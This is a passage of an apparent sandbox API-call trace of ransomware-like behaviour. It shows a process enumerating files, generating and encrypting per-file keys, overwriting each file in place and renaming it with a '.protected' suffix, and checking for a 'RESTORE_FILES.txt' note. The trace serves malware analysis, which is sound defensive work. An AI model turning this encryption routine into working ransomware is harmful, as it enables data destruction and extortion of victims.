(in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.054] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.055] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 151 [0088.055] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".txt") returned 0x0 [0088.055] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 151 [0088.055] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".rar") returned 0x0 [0088.055] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 151 [0088.055] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".zip") returned 0x0 [0088.055] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2d7, lpOverlapped=0x0) returned 1 [0088.167] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffd29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.167] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2d7, lpOverlapped=0x0) returned 1 [0088.167] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.167] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.167] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.167] CloseHandle (hObject=0x150) returned 1 [0088.168] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.protected") returned 161 [0088.168] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220.protected")) returned 1 [0088.169] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.169] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="Windows") returned -1 [0088.169] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="Program Files") returned -1 [0088.169] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", 
lpString2="Program Files (x86)") returned -1 [0088.169] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="$Recycle.bin") returned 1 [0088.169] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="System Volume Information") returned -1 [0088.169] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 151 [0088.169] StrStrIW (lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".protected") returned 0x0 [0088.169] lstrcmpW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="RESTORE_FILES.txt") returned -1 [0088.169] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.169] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 151 [0088.170] StrStrW 
(lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".txt") returned 0x0 [0088.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 151 [0088.170] StrStrW (lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".rar") returned 0x0 [0088.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 151 [0088.170] StrStrW (lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".zip") returned 0x0 [0088.170] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0088.171] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.171] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0088.171] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.171] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.171] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, 
lpOverlapped=0x0) returned 1 [0088.171] CloseHandle (hObject=0x150) returned 1 [0088.171] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.protected") returned 161 [0088.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4.protected")) returned 1 [0088.172] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.172] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="Windows") returned -1 [0088.172] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="Program Files") returned -1 [0088.172] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="Program Files (x86)") returned -1 [0088.172] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="$Recycle.bin") returned 1 [0088.172] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="System Volume Information") returned -1 [0088.172] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned 118 [0088.172] StrStrIW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".protected") returned 0x0 [0088.172] lstrcmpW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="RESTORE_FILES.txt") returned -1 [0088.172] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.172] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.173] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned 118 [0088.173] StrStrW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".txt") returned 0x0 [0088.173] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned 118 [0088.173] StrStrW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".rar") returned 0x0 [0088.173] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned 118 [0088.173] StrStrW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".zip") returned 0x0 [0088.173] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x32d, lpOverlapped=0x0) returned 1 [0088.174] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffcd3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.174] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x32d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x32d, lpOverlapped=0x0) returned 1 [0088.174] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.174] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.174] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.174] CloseHandle (hObject=0x150) returned 1 [0088.174] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD.protected") returned 128 [0088.175] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD.protected" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad.protected")) returned 1 [0088.175] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.175] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="Windows") returned -1 [0088.175] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="Program Files") returned -1 [0088.175] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="Program Files (x86)") returned -1 [0088.175] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="$Recycle.bin") returned 1 [0088.175] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="System Volume Information") returned -1 [0088.175] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 151 [0088.175] StrStrIW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".protected") returned 0x0 [0088.176] lstrcmpW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="RESTORE_FILES.txt") returned -1 [0088.176] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.176] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 151 [0088.176] StrStrW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".txt") returned 0x0 [0088.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 151 [0088.176] StrStrW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".rar") returned 0x0 [0088.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 151 [0088.176] StrStrW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".zip") returned 0x0 [0088.176] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x648, lpOverlapped=0x0) returned 1 [0088.226] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff9b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.226] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x648, lpNumberOfBytesWritten=0x295e7b4, 
lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x648, lpOverlapped=0x0) returned 1 [0088.227] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.227] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.227] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.227] CloseHandle (hObject=0x150) returned 1 [0088.227] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.protected") returned 161 [0088.227] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21.protected")) returned 1 [0088.228] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.228] lstrcmpiW 
(lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="Windows") returned -1 [0088.228] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="Program Files") returned -1 [0088.228] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="Program Files (x86)") returned -1 [0088.228] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="$Recycle.bin") returned 1 [0088.228] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="System Volume Information") returned -1 [0088.228] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 118 [0088.228] StrStrIW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", lpSrch=".protected") returned 0x0 [0088.228] lstrcmpW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="RESTORE_FILES.txt") returned -1 [0088.228] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.228] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.229] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 118 [0088.229] StrStrW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", 
lpSrch=".txt") returned 0x0 [0088.229] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 118 [0088.229] StrStrW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", lpSrch=".rar") returned 0x0 [0088.229] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 118 [0088.229] StrStrW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", lpSrch=".zip") returned 0x0 [0088.229] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x22a, lpOverlapped=0x0) returned 1 [0088.230] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffdd6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.230] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x22a, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x22a, lpOverlapped=0x0) returned 1 [0088.230] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.230] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, 